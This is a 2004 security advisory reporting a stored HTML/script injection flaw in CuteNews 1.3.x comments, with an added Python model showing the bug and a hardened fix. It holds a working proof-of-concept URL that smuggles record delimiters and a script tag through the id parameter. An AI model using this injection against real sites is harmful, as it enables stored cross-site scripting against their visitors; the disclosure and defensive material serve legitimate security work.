Original Advisory: http://www.darkbicho.iberhosting.net/advisory-11.txt
---------------------------------------------------------------------------------------------------
:.: HTML injection in CuteNews :.:
PROGRAM: CuteNews
HOMEPAGE: http://cutephp.com/
VERSION: v1.3.x
BUG: HTML injection
DATE: 15/07/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Projects <www.swp-zone.org>
Email: darkbicho@peru.com
---------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
CuteNews is a popular news publishing system, written in PHP by
CutePHP.
2.- Vulnerability:
---------------
HTML injection in comments
/inc/Shows.inc.php
Line: 189
if(!$found){ fwrite($new_comments,
"$id|>|$time|$name|$mail|$ip|$comments||\n"); }
The variable $id is not filtered: it is written into the comment record verbatim.
Because the record uses "|>|", "|" and "||" as its own delimiters, a request can
place those delimiters inside the id and supply a complete, attacker-controlled
comment entry (including HTML and script) that the comment filter on $comments
never sees.
Example (id of the news item = 1078525267):
show_news.php?subaction=addcomment&name=DarkBich0&comments=http://www.darkbicho.tk&id=1078525267|>|1090074219|DarkBich0|none|127.0.0.1|<script>alert("DarkBicho");</script>||
Screenshot: http://www.darkbicho.iberhosting.net/cutenews/cutenews.gif
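The following Python model of the comment record is an added example, not CuteNews code and not part of the original advisory. It reconstructs the line layout from the fwrite() call quoted above; the reader function (parse_line), the hardened writer, the HTML renderer and the sample request values are assumptions made for illustration.

```python
# Added example: a Python model of the CuteNews 1.3.x comment record written by the
# fwrite() quoted in the advisory ("$id|>|$time|$name|$mail|$ip|$comments||\n").
# Not CuteNews code. parse_line() is an assumed reader for that layout; the
# hardened writer and the sample request values are constructed for this example.
import html
import re

RECORD_MARK = "|>|"  # separates the news id from the comments stored for it
COMMENT_END = "||"   # terminates each stored comment
FIELD_SEP = "|"      # separates time|name|mail|ip|comments inside one comment
FIELDS = ("time", "name", "mail", "ip", "comments")

# Constructed request: the id value from the advisory's example URL. It carries the
# record's own delimiters, so it smuggles in a complete comment of its own.
INJECTED_ID = ('1078525267|>|1090074219|DarkBich0|none|127.0.0.1|'
               '<script>alert("DarkBicho");</script>||')


def write_line_vulnerable(news_id, time_, name, mail, ip, comments):
    """Mirror of the unfiltered fwrite(): every value is interpolated verbatim,
    so $id can contain "|>|", "|" and "||" and redraw the field boundaries."""
    return (f"{news_id}{RECORD_MARK}{time_}{FIELD_SEP}{name}{FIELD_SEP}{mail}"
            f"{FIELD_SEP}{ip}{FIELD_SEP}{comments}{COMMENT_END}\n")


def parse_line(line):
    """Read one stored line back (assumed reader): the text before the first "|>|"
    is the news id; the rest is a sequence of "||"-terminated comments."""
    news_id, _, rest = line.rstrip("\n").partition(RECORD_MARK)
    comments = []
    for chunk in rest.split(COMMENT_END):
        if chunk:
            comments.append(dict(zip(FIELDS, chunk.split(FIELD_SEP, len(FIELDS) - 1))))
    return news_id, comments


def write_line_hardened(news_id, time_, name, mail, ip, comments):
    """Hardened writer: the record key must be a plain decimal integer, and no
    user-supplied field may carry the delimiter characters or a line break."""
    if not re.fullmatch(r"\d+", str(news_id)):
        raise ValueError("news id must be a decimal integer")

    def clean(value):
        return re.sub(r"[|\r\n]", "", str(value))

    return write_line_vulnerable(news_id, clean(time_), clean(name), clean(mail),
                                 clean(ip), clean(comments))


def render_comment(comment):
    """Escape at the HTML boundary: stored markup is displayed, never executed."""
    return (f"<p><b>{html.escape(comment['name'])}</b>: "
            f"{html.escape(comment['comments'])}</p>")


if __name__ == "__main__":
    benign = ("1090074300", "DarkBich0", "none", "10.0.0.1", "http://www.darkbicho.tk")
    news_id, stored = parse_line(write_line_vulnerable(INJECTED_ID, *benign))
    # The line is filed under news 1078525267, and the first comment the reader sees
    # is the attacker-crafted one, with the script tag in its comments field.
    print(news_id, stored[0]["comments"])
    print(render_comment(stored[0]))
    try:
        write_line_hardened(INJECTED_ID, *benign)
    except ValueError as exc:
        print("rejected:", exc)
```

Run stand-alone, the script shows the stored line being filed under news id 1078525267 with the injected `<script>` text as the first comment, and the hardened writer rejecting the same id. The two defences are independent: the integer check on $id closes the delimiter injection, while escaping at render time stops any markup that still reaches the flat file from executing.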
3.- Exploit:
--------
http://www.darkbicho.iberhosting.net/cutenews/
4.- SOLUTION:
--------
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the CuteNews website for updates and official release details.
5.- Greetings:
---------
Greetings to my Peruvian groups swp and perunderforce :D
"PISCO IS AND ALWAYS WILL BE PERUVIAN"
6.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@peru.com
---------------------------------------------------------------------------------------------------
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF ]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"
---------------------- The End ----------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html